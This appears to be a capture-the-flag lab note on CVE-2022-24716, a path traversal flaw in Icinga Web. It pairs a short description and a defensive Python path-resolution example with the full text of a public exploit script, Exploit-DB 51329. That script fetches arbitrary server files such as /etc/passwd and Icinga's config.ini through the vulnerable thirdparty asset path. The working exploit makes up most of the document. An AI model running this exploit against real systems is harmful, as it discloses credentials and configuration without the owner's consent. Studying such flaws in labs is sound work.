CVE-2022-24716


A vulnerability classified as critical has been found in Icinga Web up to 2.9.5. It affects an unknown functionality of the component Configuration File Handler. Manipulation with an unknown input leads to a path traversal vulnerability, which is classified as CWE-22: the product uses external input to construct a pathname that is intended to identify a file or directory located underneath a restricted parent directory, but it does not properly neutralize special elements within the pathname that can cause it to resolve to a location outside of the restricted directory. This has an impact on confidentiality.
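
The CWE-22 pattern described above, as an added example that is not part of the original note and is not Icinga Web's code (which is PHP): a naive path join next to a resolver that checks containment after resolution. The function names and the temporary directory tree are assumptions constructed for illustration.

```python
import os
import tempfile

# Added illustration: function names and the directory tree are constructed.

def naive_resolve(base_dir, requested):
    # Weak pattern: os.path.join drops base_dir when `requested` is absolute,
    # and ".." segments or symlinks are never checked against the base.
    return os.path.normpath(os.path.join(base_dir, requested))

def safe_resolve(base_dir, requested):
    """Return the resolved path if it stays under base_dir, else None."""
    if os.path.isabs(requested):
        return None
    base_real = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks before the comparison.
    candidate = os.path.realpath(os.path.join(base_real, requested))
    # commonpath compares whole components, so "/srv/assets-old" is not
    # treated as being inside "/srv/assets" (a startswith() check would be).
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate

def demo():
    """Map each case to (naive result reaches the outside file, safe allows)."""
    with tempfile.TemporaryDirectory() as root:
        root = os.path.realpath(root)
        base = os.path.join(root, "assets")
        os.makedirs(os.path.join(base, "css"))
        outside = os.path.join(root, "config.ini")  # constructed, outside base
        for path in (outside, os.path.join(base, "css", "site.css")):
            with open(path, "w") as fh:
                fh.write("sample")
        os.symlink(outside, os.path.join(base, "link.ini"))
        cases = {
            "regular": "css/site.css",
            "absolute": outside,
            "dotdot": "css/../../config.ini",
            "symlink": "link.ini",
        }
        return {
            name: (os.path.realpath(naive_resolve(base, req)) == outside,
                   safe_resolve(base, req) is not None)
            for name, req in cases.items()
        }

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The check runs on the resolved path, so absolute paths, `..` segments and symlinks are all caught by the same comparison.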

exploit


┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ searchsploit -x php/webapps/51329.py
  Exploit: Icinga Web 2.10 - Arbitrary File Disclosure
      URL: https://www.exploit-db.com/exploits/51329
     Path: /usr/share/exploitdb/exploits/php/webapps/51329.py
    Codes: CVE-2022-24716
 Verified: False
File Type: Python script, ASCII text executable
 
 
#!/usr/bin/env python3
 
# Exploit Title: Icinga Web 2.10 - Arbitrary File Disclosure
# Date: 2023-03-19
# Exploit Author: Jacob Ebben
# Vendor Homepage: https://icinga.com/
# Software Link: https://github.com/Icinga/icingaweb2
# Version: <2.8.6, <2.9.6, <2.10
# Tested on: Icinga Web 2 Version 2.9.2 on Linux
# CVE: CVE-2022-24716
# Based on: https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/
 
import argparse
import requests
from termcolor import colored
 
def print_message(message, type):
    if type == 'SUCCESS':
        print('[' + colored('SUCCESS', 'green') +  '] ' + message)
    elif type == 'INFO':
        print('[' + colored('INFO', 'blue') +  '] ' + message)
    elif type == 'WARNING':
        print('[' + colored('WARNING', 'yellow') +  '] ' + message)
    elif type == 'ALERT':
        print('[' + colored('ALERT', 'yellow') +  '] ' + message)
    elif type == 'ERROR':
        print('[' + colored('ERROR', 'red') +  '] ' + message)
 
def get_normalized_url(url):
    if url[-1] != '/':
        url += '/'
    if url[0:7].lower() != 'http://' and url[0:8].lower() != 'https://':
        url = "http://" + url
    return url
 
def get_proxy_protocol(url):
    if url[0:8].lower() == 'https://':
        return 'https'
    return 'http'
 
parser = argparse.ArgumentParser(description='Arbitrary File Disclosure Vulnerability in Icinga Web <2.8.6, <2.9.6, <2.10')
parser.add_argument('TARGET', type=str,
                help='Target Icinga location (Example: http://localhost:8080/icinga2/ or https://victim.xyz/icinga/)')
parser.add_argument('FILE', type=str,
                help='Filename to gather from exploit (Example: "/etc/passwd" or "/etc/icingaweb2/config.ini")')
parser.add_argument('-P','--proxy', type=str,
                help='HTTP proxy address (Example: http://127.0.0.1:8080/)')
args = parser.parse_args()
 
if args.proxy:
    proxy_url = get_normalized_url(args.proxy)
    proxy_protocol = get_proxy_protocol(proxy_url)
    proxies = { proxy_protocol: proxy_url }
else:
    proxies = {}
 
base_url = get_normalized_url(args.TARGET)
exploit_url = base_url + "lib/icinga/icinga-php-thirdparty" + args.FILE
 
request = requests.get(base_url, proxies=proxies)
if request.status_code == 404:
        print_message("Could not connect to provided URL!", "ERROR")
        exit()
 
request = requests.get(exploit_url, proxies=proxies)
file_content = request.text
 
print(file_content)